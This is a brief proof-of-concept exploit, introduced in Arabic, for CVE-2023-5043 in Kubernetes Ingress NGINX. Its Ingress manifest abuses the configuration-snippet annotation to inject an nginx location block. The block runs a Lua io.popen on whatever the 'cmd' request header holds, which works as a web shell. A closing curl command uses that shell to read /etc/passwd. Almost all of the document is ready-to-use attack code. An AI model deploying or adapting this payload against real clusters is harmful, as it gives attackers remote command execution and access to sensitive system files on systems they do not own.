
إثبات مفهوم لاستغلال CVE-2023-5043، يوضح تنفيذ أوامر عشوائية عبر حقن التعليقات التوضيحية في Ingress NGINX داخل Kubernetes، مع مشغّل RCE قائم على curl.
حقن التعليقات التوضيحية في Ingress nginx يؤدي إلى تنفيذ أوامر عشوائية
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: ingress-exploit
annotations:
kubernetes.io/ingress.class: "nginx"
nginx.ingress.kubernetes.io/configuration-snippet: |
more_set_headers "robinak"
proxy_pass http://upstream_balancer;
proxy_redirect off;
}
location /robinak/ { content_by_lua_block { local rsfile = io.popen(ngx.req.get_headers()["cmd"]);local rschar = rsfile:read("*all");ngx.say(rschar); } } location /fs/{
spec:
rules:
- host: robinak.me
http:
paths:
- path: /
pathType: Prefix
backend:
service:
name: exploit
port:
number: 80
curl -v -H 'Host: robinak.me' -H "cmd: cat /etc/passwd" http://IP/robinak/
